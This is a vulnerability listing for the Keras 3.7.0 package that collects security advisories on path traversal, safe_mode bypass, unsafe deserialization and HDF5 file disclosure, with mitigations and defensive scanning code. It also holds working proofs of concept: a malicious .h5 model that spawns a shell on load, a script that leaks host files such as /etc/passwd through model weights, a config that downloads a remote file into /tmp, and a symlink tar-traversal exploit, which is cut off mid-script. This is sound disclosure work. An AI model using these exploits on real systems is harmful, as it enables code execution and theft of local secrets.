Python/keras/3.7.0
Multi-backend Keras
https://pypi.org/project/keras
Apache-2.0
14 Security Vulnerabilities
Duplicate Advisory: Keras keras.utils.get_file API is vulnerable to a path traversal attack
- https://github.com/keras-team/keras/security/advisories/GHSA-hjqc-jx6g-rwp9
- https://nvd.nist.gov/vuln/detail/CVE-2025-12060
- https://github.com/keras-team/keras/pull/21760
- https://github.com/keras-team/keras/commit/47fcb397ee4caffd5a75efd1fa3067559594e951
- https://github.com/advisories/GHSA-28jp-44vh-q42h
- https://huntr.com/bounties/f94f5beb-54d8-4e6a-8bac-86d9aee103f4
Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-hjqc-jx6g-rwp9. This link is maintained to preserve external references.
Original Description
The keras.utils.get_file API in Keras, when used with the extract=True option for tar archives, is vulnerable to a path traversal attack. The utility uses Python's tarfile.extractall function without the `filter="data"` feature. A remote attacker can craft a malicious tar archive containing special symlinks, which, when extracted, allows them to write arbitrary files to any location on the filesystem outside of the intended destination folder. This vulnerability is linked to the underlying Python tarfile weakness, identified as CVE-2025-4517. Note that upgrading Python to one of the versions that fix CVE-2025-4517 (e.g. Python 3.13.4) is not enough. One additionally needs to upgrade Keras to a version with the fix (Keras 3.12).
Keras is vulnerable to Deserialization of Untrusted Data
- https://nvd.nist.gov/vuln/detail/CVE-2025-9906
- https://github.com/keras-team/keras/pull/21429
- https://github.com/keras-team/keras/commit/713172ab56b864e59e2aa79b1a51b0e728bba858
- https://github.com/keras-team/keras/releases/tag/v3.11.0
- https://osv.dev/vulnerability/CVE-2025-9906
- https://github.com/advisories/GHSA-36fq-jgmw-4r9c
Arbitrary Code Execution in Keras
Keras versions prior to 3.11.0 allow for arbitrary code execution when loading a crafted .keras model archive, even when safe_mode=True.
The issue arises because the archive’s config.json is parsed before layer deserialization. This can invoke keras.config.enable_unsafe_deserialization(), effectively disabling safe mode from within the loading process itself. An attacker can place this call first in the archive and then include a Lambda layer whose function is deserialized from a pickle, leading to the execution of attacker-controlled Python code as soon as a victim loads the model file.
Exploitation requires a user to open an untrusted model; no additional privileges are needed. The fix in version 3.11.0 enforces safe-mode semantics before reading any user-controlled configuration and prevents the toggling of unsafe deserialization via the config file.
Affected versions: < 3.11.0 Patched version: 3.11.0
It is recommended to upgrade to version 3.11.0 or later and to avoid opening untrusted model files.
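Until an upgrade is possible, archives can also be screened before loading: a `.keras` file is an ordinary zip archive whose model structure lives in `config.json`, so a pre-scan can reject suspicious constructs before `load_model` ever parses them. A minimal sketch, where the function name and the checked keys are illustrative rather than an official or exhaustive blocklist:

```python
import json
import zipfile


def scan_keras_archive(path):
    """Raise ValueError if the archive's config.json contains constructs
    commonly abused in malicious models (illustrative checks only)."""
    with zipfile.ZipFile(path) as zf:
        config = json.loads(zf.read("config.json"))

    def walk(node):
        if isinstance(node, dict):
            class_name = node.get("class_name")
            if class_name in {"Lambda", "__lambda__", "function"}:
                raise ValueError(f"refusing archive: found {class_name!r} in config")
            module = node.get("module")
            if isinstance(module, str) and not module.startswith("keras"):
                raise ValueError(f"refusing archive: non-Keras module {module!r}")
            for value in node.values():
                walk(value)
        elif isinstance(node, list):
            for item in node:
                walk(item)

    walk(config)
```

This check is deliberately blunt (it also rejects legitimate Lambda layers), but for pipelines that only consume standard architectures, failing closed is usually acceptable.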
The Keras `Model.load_model` method **silently** ignores `safe_mode=True` and allows arbitrary code execution when a `.h5`/`.hdf5` file is loaded.
Note: This report has already been discussed with the Google OSS VRP team, who recommended that I reach out directly to the Keras team. I’ve chosen to do so privately rather than opening a public issue, due to the potential security implications. I also attempted to use the email address listed in your SECURITY.md, but received no response.
Summary
When a model in the .h5 (or .hdf5) format is loaded using the Keras Model.load_model method, the safe_mode=True setting is silently ignored without any warning or error. This allows an attacker to execute arbitrary code on the victim’s machine with the same privileges as the Keras application. This report is specific to the .h5/.hdf5 file format. The attack works regardless of the other parameters passed to load_model and does not require any sophisticated technique—.h5 and .hdf5 files are simply not checked for unsafe code execution.
From this point on, I will refer only to the .h5 file format, though everything equally applies to .hdf5.
Details
Intended behaviour
According to the official Keras documentation, safe_mode is defined as:
safe_mode: Boolean, whether to disallow unsafe lambda deserialization. When safe_mode=False, loading an object has the potential to trigger arbitrary code execution. This argument is only applicable to the Keras v3 model format. Defaults to True.
I understand that the behavior described in this report is somehow intentional, as safe_mode is only applicable to .keras models.
However, in practice, this behavior is misleading for users who are unaware of the internal Keras implementation. .h5 files can still be loaded seamlessly using load_model with safe_mode=True, and the absence of any warning or error creates a false sense of security. Whether intended or not, I believe silently ignoring a security-related parameter is not the best possible design decision. At a minimum, if safe_mode cannot be applied to a given file format, an explicit error should be raised to alert the user.
This issue is particularly critical given the widespread use of the .h5 format, despite the introduction of newer formats.
As a small anecdotal test, I asked several of my colleagues what they would expect when loading a .h5 file with safe_mode=True. None of them expected the setting to be silently ignored, even after reading the documentation. While this is a small sample, all of these colleagues are cybersecurity researchers—experts in binary or ML security—and regular participants in DEF CON finals. I was careful not to give any hints about the vulnerability in our discussion.
Technical Details
Examining the implementation of load_model in keras/src/saving/saving_api.py, we can see that the safe_mode parameter is completely ignored when loading .h5 files. Here's the relevant snippet:
```python
def load_model(filepath, custom_objects=None, compile=True, safe_mode=True):
    is_keras_zip = ...
    is_keras_dir = ...
    is_hf = ...

    # Support for remote zip files
    if (
        file_utils.is_remote_path(filepath)
        and not file_utils.isdir(filepath)
        and not is_keras_zip
        and not is_hf
    ):
        ...

    if is_keras_zip or is_keras_dir or is_hf:
        ...

    if str(filepath).endswith((".h5", ".hdf5")):
        return legacy_h5_format.load_model_from_hdf5(
            filepath, custom_objects=custom_objects, compile=compile
        )
```
As shown, when the file format is .h5 or .hdf5, the method delegates to legacy_h5_format.load_model_from_hdf5, which does not use or check the safe_mode parameter at all.
Solution
Since the release of the new .keras format, I believe the simplest and most effective way to address this misleading behavior—and to improve security in Keras—is to have the safe_mode parameter raise an explicit error when safe_mode=True is used with .h5/.hdf5 files. This error should be clear and informative, explaining that the legacy format does not support safe_mode and outlining the associated risks of loading such files.
I recognize this fix may have minor backward compatibility considerations.
If you confirm that you're open to this approach, I’d be happy to open a PR that includes the missing check.
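The missing check the report proposes would be only a few lines. A hypothetical wrapper, here called `load_model_checked` (not an actual Keras API), that fails closed for the legacy format rather than silently dropping the flag:

```python
def load_model_checked(filepath, *, safe_mode=True, **kwargs):
    """Refuse legacy HDF5 files when safe_mode=True instead of silently
    ignoring the flag (hypothetical wrapper, not part of Keras)."""
    if safe_mode and str(filepath).endswith((".h5", ".hdf5")):
        raise ValueError(
            "safe_mode=True cannot be enforced for legacy .h5/.hdf5 files: "
            "this format may embed pickled code that runs on load. Convert "
            "the model to the .keras format, or pass safe_mode=False only "
            "for files from a fully trusted source."
        )
    import keras  # deferred so the guard itself has no heavy dependency

    return keras.models.load_model(filepath, safe_mode=safe_mode, **kwargs)
```

Calling `load_model_checked("model.h5")` raises immediately, while `.keras` files pass through to the normal loader unchanged.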
PoC
From the attacker’s perspective, creating a malicious .h5 model is as simple as the following:
```python
import keras

f = lambda x: (
    exec("import os; os.system('sh')"),
    x,
)

model = keras.Sequential()
model.add(keras.layers.Input(shape=(1,)))
model.add(keras.layers.Lambda(f))
model.compile()
keras.saving.save_model(model, "./provola.h5")
```
From the victim’s side, triggering code execution is just as simple:
```python
import keras

model = keras.models.load_model("./provola.h5", safe_mode=True)
```
That’s all. The exploit occurs during model loading, with no further interaction required. The parameters passed to the method do not mitigate or influence the attack in any way.
As expected, the attacker can substitute the exec(...) call with any payload. Whatever command is used will execute with the same permissions as the Keras application.
Attack scenario
The attacker may distribute a malicious .h5/.hdf5 model on platforms such as Hugging Face, or act as a malicious node in a federated learning environment. The victim only needs to load the model—even with safe_mode=True that would give the illusion of security. No inference or further action is required, making the threat particularly stealthy and dangerous.
Once the model is loaded, the attacker gains the ability to execute arbitrary code on the victim’s machine with the same privileges as the Keras process. The provided proof-of-concept demonstrates a simple shell spawn, but any payload could be delivered this way.
Keras has a Local File Disclosure via HDF5 External Storage During Keras Weight Loading
- https://github.com/keras-team/keras/security/advisories/GHSA-3m4q-jmj6-r34q
- https://nvd.nist.gov/vuln/detail/CVE-2026-1669
- https://github.com/keras-team/keras/pull/22057
- https://github.com/keras-team/keras/commit/8a37f9dadd8e23fa4ee3f537eeb6413e75d12553
- https://github.com/keras-team/keras/releases/tag/v3.12.1
- https://github.com/keras-team/keras/releases/tag/v3.13.2
- https://github.com/advisories/GHSA-3m4q-jmj6-r34q
Summary
TensorFlow / Keras continues to honor HDF5 “external storage” and ExternalLink features when loading weights. A malicious .weights.h5 (or a .keras archive embedding such weights) can direct load_weights() to read from an arbitrary readable filesystem path. The bytes pulled from that path populate model tensors and become observable through inference or subsequent re-save operations. Keras “safe mode” only guards object deserialization and does not cover weight I/O, so this behaviour persists even with safe mode enabled. The issue is confirmed on the latest publicly released stack (tensorflow 2.20.0, keras 3.11.3, h5py 3.15.1, numpy 2.3.4).
Impact
- Class: CWE-200 (Exposure of Sensitive Information), CWE-73 (External Control of File Name or Path)
- What leaks: Contents of any readable file on the host (e.g., `/etc/hosts`, `/etc/passwd`, `/etc/hostname`).
- Visibility: Secrets appear in model outputs (e.g., Dense layer bias) or get embedded into newly saved artifacts.
- Prerequisites: Victim executes `model.load_weights()` or `tf.keras.models.load_model()` on an attacker-supplied HDF5 weights file or `.keras` archive.
- Scope: Applies to modern Keras (3.x) and TensorFlow 2.x lines; legacy HDF5 paths remain susceptible.
Attacker Scenario
- Initial foothold: The attacker convinces a user (or CI automation) to consume a weight artifact, perhaps by publishing a pre-trained model, contributing to an open-source repository, or attaching weights to a bug report.
- Crafted payload: The artifact bundles innocuous model metadata but rewrites one or more datasets to use HDF5 external storage or external links pointing at sensitive files on the victim host (e.g., `/home/<user>/.ssh/id_rsa`, `/etc/shadow` if readable, configuration files containing API keys, etc.).
- Execution: The victim calls `model.load_weights()` (or `tf.keras.models.load_model()` for `.keras` archives). HDF5 follows the external references, opens the targeted host file, and streams its bytes into the model tensors.
- Exfiltration vectors:
  - Running inference on controlled inputs (e.g., zero vectors) yields outputs equal to the injected weights; the attacker or downstream consumer can read the leaked data.
  - Re-saving the model (weights or `.keras` archive) persists the secret into a new artifact, which may later be shared publicly or uploaded to a model registry.
  - If the victim pushes the re-saved artifact to source control or a package repository, the attacker retrieves the captured data without needing continued access to the victim environment.
Additional Preconditions
- The target file must exist and be readable by the process running TensorFlow/Keras.
- Safe mode (`load_model(..., safe_mode=True)`) does not mitigate the issue because the attack path is weight loading rather than object/lambda deserialization.
- Environments with strict filesystem permissioning or sandboxing (e.g., a container runtime blocking access to `/etc/hostname`) can reduce impact, but common defaults expose a broad set of host files.
Environment Used for Verification (2025‑10‑19)
- OS: Debian-based container running Python 3.11.
- Packages (installed via `python -m pip install -U ...`): `tensorflow==2.20.0`, `keras==3.11.3`, `h5py==3.15.1`, `numpy==2.3.4`
- Tooling: `strace` (for syscall tracing); `pip` upgraded to latest before installs.
- Debug flags: `PYTHONFAULTHANDLER=1`, `TF_CPP_MIN_LOG_LEVEL=0` during instrumentation to capture verbose logs if needed.
Reproduction Instructions (Weights-Only PoC)
- Ensure the environment above (or equivalent) is prepared.
- Save the following script as `weights_external_demo.py`:
```python
from __future__ import annotations
import os
from pathlib import Path
import numpy as np
import tensorflow as tf
import h5py


def choose_host_file() -> Path:
    candidates = [
        os.environ.get("KFLI_PATH"),
        "/etc/machine-id",
        "/etc/hostname",
        "/proc/sys/kernel/hostname",
        "/etc/passwd",
    ]
    for candidate in candidates:
        if not candidate:
            continue
        path = Path(candidate)
        if path.exists() and path.is_file():
            return path
    raise FileNotFoundError("set KFLI_PATH to a readable file")


def build_model(units: int) -> tf.keras.Model:
    model = tf.keras.Sequential([
        tf.keras.layers.Input(shape=(1,), name="input"),
        tf.keras.layers.Dense(units, activation=None, use_bias=True, name="dense"),
    ])
    model(tf.zeros((1, 1)))  # build weights
    return model


def find_bias_dataset(h5file: h5py.File) -> str:
    matches: list[str] = []

    def visit(name: str, obj) -> None:
        if isinstance(obj, h5py.Dataset) and name.endswith("bias:0"):
            matches.append(name)

    h5file.visititems(visit)
    if not matches:
        raise RuntimeError("bias dataset not found")
    return matches[0]


def rewrite_bias_external(path: Path, host_file: Path) -> tuple[int, int]:
    with h5py.File(path, "r+") as h5file:
        bias_path = find_bias_dataset(h5file)
        parent = h5file[str(Path(bias_path).parent)]
        dset_name = Path(bias_path).name
        del parent[dset_name]
        max_bytes = 128
        size = host_file.stat().st_size
        nbytes = min(size, max_bytes)
        nbytes = (nbytes // 4) * 4 or 32  # multiple of 4 for float32 packing
        units = max(1, nbytes // 4)
        parent.create_dataset(
            dset_name,
            shape=(units,),
            dtype="float32",
            external=[(host_file.as_posix(), 0, nbytes)],
        )
    return units, nbytes


def floats_to_ascii(arr: np.ndarray) -> tuple[str, str]:
    raw = np.ascontiguousarray(arr).view(np.uint8)
    ascii_preview = bytes(b if 32 <= b < 127 else 46 for b in raw).decode("ascii", "ignore")
    hex_preview = raw[:64].tobytes().hex()
    return ascii_preview, hex_preview


def main() -> None:
    host_file = choose_host_file()
    model = build_model(units=32)
    weights_path = Path("weights_demo.h5")
    model.save_weights(weights_path.as_posix())
    units, nbytes = rewrite_bias_external(weights_path, host_file)
    print("secret_text_source", host_file)
    print("units", units, "bytes_mapped", nbytes)
    model.load_weights(weights_path.as_posix())
    output = model.predict(tf.zeros((1, 1)), verbose=0)[0]
    ascii_preview, hex_preview = floats_to_ascii(output)
    print("recovered_ascii", ascii_preview)
    print("recovered_hex64", hex_preview)
    saved = Path("weights_demo_resaved.h5")
    model.save_weights(saved.as_posix())
    print("resaved_weights", saved.as_posix())


if __name__ == "__main__":
    main()
```
- Execute `python weights_external_demo.py`.
- Observe:
  - `secret_text_source` prints the chosen host file path.
  - `recovered_ascii`/`recovered_hex64` display the file contents recovered via model inference.
  - A re-saved weights file contains the leaked bytes inside the artifact.
Expanded Validation (Multiple Attack Scenarios)
The following test harness generalises the attack for multiple HDF5 constructs:
- Build a minimal feed-forward model and baseline weights.
- Create three malicious variants:
  - External storage dataset: dataset references `/etc/hosts`.
  - External link: `ExternalLink` pointing at `/etc/passwd`.
  - Indirect link: external storage referencing a helper HDF5 that, in turn, refers to `/etc/hostname`.
- Run each scenario under `strace -f -e trace=open,openat,read` while calling `model.load_weights(...)`.
- Post-process traces and weight tensors to show the exact bytes loaded.
Relevant syscall excerpts captured during the run:
```
openat(AT_FDCWD, "/etc/hosts", O_RDONLY|O_CLOEXEC) = 7
read(7, "127.0.0.1 localhost\n", 64) = 21
...
openat(AT_FDCWD, "/etc/passwd", O_RDONLY|O_CLOEXEC) = 9
read(9, "root:x:0:0:root:/root:/bin/bash\n", 64) = 32
...
openat(AT_FDCWD, "/etc/hostname", O_RDONLY|O_CLOEXEC) = 8
read(8, "example-host\n", 64) = 13
```
The corresponding model weight bytes (converted to ASCII) mirrored these file contents, confirming successful exfiltration in every case.
Recommended Product Fix
- Default-deny external datasets/links:
  - Inspect creation property lists (`get_external_count`) before materialising tensors.
  - Resolve `SoftLink`/`ExternalLink` targets and block if they leave the HDF5 file.
- Provide an escape hatch:
  - Offer an explicit `allow_external_data=True` flag or environment variable for advanced users who truly rely on HDF5 external storage.
- Documentation:
  - Update security guidance and API docs to clarify that weight loading bypasses safe mode and that external HDF5 references are rejected by default.
- Regression coverage:
  - Add automated tests mirroring the scenarios above to ensure future refactors do not reintroduce the issue.
Workarounds
- Avoid loading untrusted HDF5 weight files.
- Pre-scan weight files using `h5py` to detect external datasets or links before invoking Keras loaders.
- Prefer alternate formats (e.g., NumPy `.npz`) that lack external reference capabilities when exchanging weights.
- If loading such files is unavoidable, run the load inside a sandboxed environment with limited filesystem access.
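The `h5py` pre-scan suggested above can be sketched in a few lines (the helper name is mine); it walks the file without dereferencing links and flags both `ExternalLink` objects and datasets backed by HDF5 external storage:

```python
import h5py


def find_external_refs(path):
    """Names of objects referencing data outside this HDF5 file
    (illustrative pre-scan; reject the file if the list is non-empty)."""
    flagged = []

    def walk(group, prefix):
        for name in group:
            full = f"{prefix}/{name}" if prefix else name
            # Inspect the link itself so external targets are never
            # dereferenced (broken targets would otherwise raise).
            link = group.get(name, getlink=True)
            if isinstance(link, h5py.ExternalLink):
                flagged.append(full)
                continue
            obj = group.get(name)
            if isinstance(obj, h5py.Group):
                walk(obj, full)
            elif isinstance(obj, h5py.Dataset) and obj.external:
                # Dataset.external lists (filename, offset, size) tuples
                # when HDF5 external storage is in use, else None.
                flagged.append(full)

    with h5py.File(path, "r") as f:
        walk(f, "")
    return flagged
```

Rejecting any file for which this list is non-empty gives user code the default-deny behaviour recommended in the product-fix section.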
Timeline (UTC)
- 2025‑10‑18: Initial proof against TensorFlow 2.12.0 confirmed local file disclosure.
- 2025‑10‑19: Re-validated on TensorFlow 2.20.0 / Keras 3.11.3 with syscall tracing; produced weight artifacts and JSON summaries for each malicious scenario; implemented `safe_keras_hdf5.py` prototype guard.
Arbitrary Code Execution via Crafted Keras Config for Model Loading
- https://github.com/keras-team/keras/security/advisories/GHSA-48g7-3x6r-xfhp
- https://nvd.nist.gov/vuln/detail/CVE-2025-1550
- https://github.com/keras-team/keras/pull/20751
- https://github.com/keras-team/keras/commit/e67ac8ffd0c883bec68eb65bb52340c7f9d3a903
- https://github.com/keras-team/keras/releases/tag/v3.9.0
- https://github.com/advisories/GHSA-48g7-3x6r-xfhp
Impact
The Keras Model.load_model function permits arbitrary code execution, even with safe_mode=True, through a manually constructed, malicious .keras archive. By altering the config.json file within the archive, an attacker can specify arbitrary Python modules and functions, along with their arguments, to be loaded and executed during model loading.
Patches
This problem is fixed starting with version 3.9.
Workarounds
Only load models from trusted sources and model archives created with Keras.
References
Duplicate Advisory: Keras arbitrary code execution vulnerability
Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-48g7-3x6r-xfhp. This link is maintained to preserve external references.
Original Description
The Keras Model.load_model function permits arbitrary code execution, even with safe_mode=True, through a manually constructed, malicious .keras archive. By altering the config.json file within the archive, an attacker can specify arbitrary Python modules and functions, along with their arguments, to be loaded and executed during model loading.
Duplicate Advisory: The Keras `Model.load_model` method **silently** ignores `safe_mode=True` and allows arbitrary code execution when a `.h5`/`.hdf5` file is loaded.
Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-36rr-ww3j-vrjv. This link is maintained to preserve external references.
Original Description
The Keras Model.load_model method can be exploited to achieve arbitrary code execution, even with safe_mode=True.
One can create a specially crafted .h5/.hdf5 model archive that, when loaded via Model.load_model, will trigger arbitrary code to be executed.
This is achieved by crafting a special .h5 archive file that uses the Lambda layer feature of keras which allows arbitrary Python code in the form of pickled code. The vulnerability comes from the fact that the safe_mode=True option is not honored when reading .h5 archives.
Note that the .h5/.hdf5 format is a legacy format supported by Keras 3 for backwards compatibility.
Keras vulnerable to CVE-2025-1550 bypass via reuse of internal functionality
- https://github.com/keras-team/keras/security/advisories/GHSA-c9rc-mg46-23w3
- https://nvd.nist.gov/vuln/detail/CVE-2025-8747
- https://github.com/keras-team/keras/pull/21429
- https://github.com/keras-team/keras/commit/713172ab56b864e59e2aa79b1a51b0e728bba858
- https://jfrog.com/blog/keras-safe_mode-bypass-vulnerability
- https://github.com/advisories/GHSA-c9rc-mg46-23w3
Summary
It is possible to bypass the mitigation introduced in response to CVE-2025-1550, when an untrusted Keras v3 model is loaded, even when “safe_mode” is enabled, by crafting malicious arguments to built-in Keras modules.
The vulnerability is exploitable on the default configuration and does not depend on user input (just requires an untrusted model to be loaded).
Impact
| Type | Vector | Impact |
|---|---|---|
| Unsafe deserialization | Client-Side (when loading untrusted model) | Arbitrary file overwrite. Can lead to Arbitrary code execution in many cases. |
Details
Keras’ safe_mode flag is designed to disallow unsafe lambda deserialization - specifically by rejecting any arbitrary embedded Python code, marked by the “lambda” class name. https://github.com/keras-team/keras/blob/v3.8.0/keras/src/saving/serialization_lib.py#L641 -
```python
if config["class_name"] == "__lambda__":
    if safe_mode:
        raise ValueError(
            "Requested the deserialization of a `lambda` object. "
            "This carries a potential risk of arbitrary code execution "
            "and thus it is disallowed by default. If you trust the "
            "source of the saved model, you can pass `safe_mode=False` to "
            "the loading function in order to allow `lambda` loading, "
            "or call `keras.config.enable_unsafe_deserialization()`."
        )
```
A fix to the vulnerability, allowing deserialization of the object only from internal Keras modules, was introduced in the commit bb340d6780fdd6e115f2f4f78d8dbe374971c930.
```python
package = module.split(".", maxsplit=1)[0]
if package in {"keras", "keras_hub", "keras_cv", "keras_nlp"}:
```
However, it is still possible to exploit model loading, for example by reusing the internal Keras function keras.utils.get_file, and download remote files to an attacker-controlled location. This allows for arbitrary file overwrite which in many cases could also lead to remote code execution. For example, an attacker would be able to download a malicious authorized_keys file into the user’s SSH folder, giving the attacker full SSH access to the victim’s machine. Since the model does not contain arbitrary Python code, this scenario will not be blocked by “safe_mode”. It will bypass the latest fix since it uses a function from one of the approved modules (keras).
Example
The following truncated config.json will cause a remote file download from https://raw.githubusercontent.com/andr3colonel/when_you_watch_computer/refs/heads/master/index.js to the local /tmp folder, by sending arbitrary arguments to Keras’ builtin function keras.utils.get_file() -
```json
{
  "class_name": "Lambda",
  "config": {
    "arguments": {
      "origin": "https://raw.githubusercontent.com/andr3colonel/when_you_watch_computer/refs/heads/master/index.js",
      "cache_dir": "/tmp",
      "cache_subdir": "",
      "force_download": true
    },
    "function": {
      "class_name": "function",
      "config": "get_file",
      "module": "keras.utils"
    }
  },
```
PoC
Download `malicious_model_download.keras` to a local directory
Load the model -
```python
from keras.models import load_model

model = load_model("malicious_model_download.keras", safe_mode=True)
```
- Observe that a new file `index.js` was created in the `/tmp` directory
Fix suggestions
- Add an additional flag `block_all_lambda` that allows users to completely disallow loading models with a Lambda layer.
- Audit the `keras`, `keras_hub`, `keras_cv`, `keras_nlp` modules and remove/block all "gadget functions" which could be used by malicious ML models.
- Add an additional flag `lambda_whitelist_functions` that allows users to specify a list of functions that are allowed to be invoked by a Lambda layer.
Credit
The vulnerability was discovered by Andrey Polkovnichenko of the JFrog Vulnerability Research team.
keras Path Traversal vulnerability
- https://nvd.nist.gov/vuln/detail/CVE-2024-55459
- https://github.com/keras-team/keras
- https://keras.io
- https://river-bicycle-f1e.notion.site/Arbitrary-File-Write-Vulnerability-in-get_file-function-11888e31952580179224e50892976d32
- https://github.com/keras-team/keras/blob/8f5592bcb61ff48c96560c8923e482db1076b54a/keras/src/utils/file_utils.py#L115
- https://github.com/advisories/GHSA-cjgq-5qmw-rcj6
An issue in keras 3.7.0 allows attackers to write arbitrary files to the user's machine by downloading a crafted tar file through the get_file function.
Duplicate Advisory: Keras vulnerable to arbitrary file read in the model loading mechanism (HDF5 integration)
Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-3m4q-jmj6-r34q. This link is maintained to preserve external references.
Original Description
Arbitrary file read in the model loading mechanism (HDF5 integration) in Keras versions 3.0.0 through 3.13.1 on all supported platforms allows a remote attacker to read local files and disclose sensitive information via a crafted .keras model file utilizing HDF5 external dataset references.
Keras Directory Traversal Vulnerability
- https://github.com/keras-team/keras/security/advisories/GHSA-hjqc-jx6g-rwp9
- https://nvd.nist.gov/vuln/detail/CVE-2025-12060
- https://nvd.nist.gov/vuln/detail/CVE-2025-12638
- https://github.com/keras-team/keras/pull/21760
- https://github.com/keras-team/keras/commit/47fcb397ee4caffd5a75efd1fa3067559594e951
- https://huntr.com/bounties/f94f5beb-54d8-4e6a-8bac-86d9aee103f4
- https://github.com/advisories/GHSA-hjqc-jx6g-rwp9
Summary
Keras's keras.utils.get_file() function is vulnerable to directory traversal attacks despite implementing filter_safe_paths(). The vulnerability exists because extract_archive() uses Python's tarfile.extractall() method without the security-critical filter="data" parameter. A PATH_MAX symlink resolution bug occurs before path filtering, allowing malicious tar archives to bypass security checks and write files outside the intended extraction directory.
Details
Root Cause Analysis
Current Keras Implementation:

```python
# From keras/src/utils/file_utils.py#L121
if zipfile.is_zipfile(filepath):
    # Zip archive.
    archive.extractall(path)
else:
    # Tar archive, perhaps unsafe. Filter paths.
    archive.extractall(path, members=filter_safe_paths(archive))
```
The Critical Flaw
While Keras attempts to filter unsafe paths using filter_safe_paths(), this filtering happens after the tar archive members are parsed and before actual extraction. However, the PATH_MAX symlink resolution bug occurs during extraction, not during member enumeration.
Exploitation Flow:
1. Archive parsing: filter_safe_paths() sees symlink paths that appear safe
2. Extraction begins: extractall() processes the filtered members
3. PATH_MAX bug triggers: symlink resolution fails due to path length limits
4. Security bypass: failed resolution causes literal path interpretation
5. Directory traversal: files written outside intended directory
Technical Details
The vulnerability exploits a known issue in Python's tarfile module where excessively long symlink paths can cause resolution failures, leading to the symlink being treated as a literal path. This bypasses Keras's path filtering because:
- `filter_safe_paths()` operates on the parsed tar member information
- The PATH_MAX bug occurs during actual file system operations in `extractall()`
- Failed symlink resolution falls back to literal path interpretation
- This allows traversal paths like `../../../../etc/passwd` to be written
Affected Code Location
File: keras/src/utils/file_utils.py
Function: extract_archive() around line 121
Issue: Missing filter="data" parameter in tarfile.extractall()
Proof of Concept
#!/usr/bin/env python3
import os, io, sys, tarfile, pathlib, platform, threading, time
import http.server, socketserver

# Import Keras directly (not through TensorFlow)
try:
    import keras
    print("Using standalone Keras:", keras.__version__)
    get_file = keras.utils.get_file
except ImportError:
    try:
        import tensorflow as tf
        print("Using Keras via TensorFlow:", tf.keras.__version__)
        get_file = tf.keras.utils.get_file
    except ImportError:
        print("Neither Keras nor TensorFlow found!")
        sys.exit(1)
print("=" * 60)
print("Keras get_file() PATH_MAX Symlink Vulnerability PoC")
print("=" * 60)
print("Python:", sys.version.split()[0])
print("Platform:", platform.platform())
root = pathlib.Path.cwd()
print(f"Working directory: {root}")
# Create target directory for exploit demonstration
exploit_dir = root / "exploit"
exploit_dir.mkdir(exist_ok=True)
# Clean up any previous exploit files
try:
    (exploit_dir / "keras_pwned.txt").unlink()
except FileNotFoundError:
    pass
print(f"\n=== INITIAL STATE ===")
print(f"Exploit directory: {exploit_dir}")
print(f"Files in exploit/: {[f.name for f in exploit_dir.iterdir()]}")
# Create malicious tar with PATH_MAX symlink resolution bug
print(f"\n=== Building PATH_MAX Symlink Exploit ===")
# Parameters for PATH_MAX exploitation
comp = 'd' * (55 if sys.platform == 'darwin' else 247)
steps = "abcdefghijklmnop" # 16-step symlink chain
path = ""
with tarfile.open("keras_dataset.tgz", mode="w:gz") as tar:
    print("Creating deep symlink chain...")
    # Build the symlink chain that will exceed PATH_MAX during resolution
    for i, step in enumerate(steps):
        # Directory with long name
        dir_info = tarfile.TarInfo(os.path.join(path, comp))
        dir_info.type = tarfile.DIRTYPE
        tar.addfile(dir_info)
        # Symlink pointing to that directory
        link_info = tarfile.TarInfo(os.path.join(path, step))
        link_info.type = tarfile.SYMTYPE
        link_info.linkname = comp
        tar.addfile(link_info)
        path = os.path.join(path, comp)
        if i < 3 or i % 4 == 0:  # Print progress for first few and every 4th
            print(f" Step {i+1}: {step} -> {comp[:20]}...")

    # Create the final symlink that exceeds PATH_MAX
    # This is where the symlink resolution breaks down
    long_name = "x" * 254
    linkpath = os.path.join("/".join(steps), long_name)
    max_link = tarfile.TarInfo(linkpath)
    max_link.type = tarfile.SYMTYPE
    max_link.linkname = ("../" * len(steps))
    tar.addfile(max_link)
    print(f"✓ Created PATH_MAX symlink: {len(linkpath)} characters")
    print(f" Points to: {'../' * len(steps)}")

    # Exploit file through the broken symlink resolution
    exploit_path = linkpath + "/../../../exploit/keras_pwned.txt"
    exploit_content = b"KERAS VULNERABILITY CONFIRMED!\nThis file was created outside the cache directory!\nKeras get_file() is vulnerable to PATH_MAX symlink attacks!\n"
    exploit_file = tarfile.TarInfo(exploit_path)
    exploit_file.type = tarfile.REGTYPE
    exploit_file.size = len(exploit_content)
    tar.addfile(exploit_file, fileobj=io.BytesIO(exploit_content))
    print(f"✓ Added exploit file via broken symlink path")

    # Add legitimate dataset content
    dataset_content = b"# Keras Dataset Sample\nThis appears to be a legitimate ML dataset\nimage1.jpg,cat\nimage2.jpg,dog\nimage3.jpg,bird\n"
    dataset_file = tarfile.TarInfo("dataset/labels.csv")
    dataset_file.type = tarfile.REGTYPE
    dataset_file.size = len(dataset_content)
    tar.addfile(dataset_file, fileobj=io.BytesIO(dataset_content))

    # Dataset directory
    dataset_dir = tarfile.TarInfo("dataset/")
    dataset_dir.type = tarfile.DIRTYPE
    tar.addfile(dataset_dir)
print("✓ Malicious Keras dataset created")
# Comparison Test: Python tarfile with filter (SAFE)
print(f"\n=== COMPARISON: Python tarfile with data filter ===")
try:
    with tarfile.open("keras_dataset.tgz", "r:gz") as tar:
        tar.extractall("python_safe", filter="data")
    files_after = [f.name for f in exploit_dir.iterdir()]
    print(f"✓ Python safe extraction completed")
    print(f"Files in exploit/: {files_after}")
    # Cleanup
    import shutil
    if pathlib.Path("python_safe").exists():
        shutil.rmtree("python_safe", ignore_errors=True)
except Exception as e:
    print(f"❌ Python safe extraction blocked: {str(e)[:80]}...")
    files_after = [f.name for f in exploit_dir.iterdir()]
    print(f"Files in exploit/: {files_after}")
# Start HTTP server to serve malicious archive
class SilentServer(http.server.SimpleHTTPRequestHandler):
    def log_message(self, *args):
        pass

def run_server():
    with socketserver.TCPServer(("127.0.0.1", 8005), SilentServer) as httpd:
        httpd.allow_reuse_address = True
        httpd.serve_forever()

server = threading.Thread(target=run_server, daemon=True)
server.start()
time.sleep(0.3)
# Keras vulnerability test
cache_dir = root / "keras_cache"
cache_dir.mkdir(exist_ok=True)
url = "http://127.0.0.1:8005/keras_dataset.tgz"
print(f"\n=== KERAS VULNERABILITY TEST ===")
print(f"Testing: keras.utils.get_file() with extract=True")
print(f"URL: {url}")
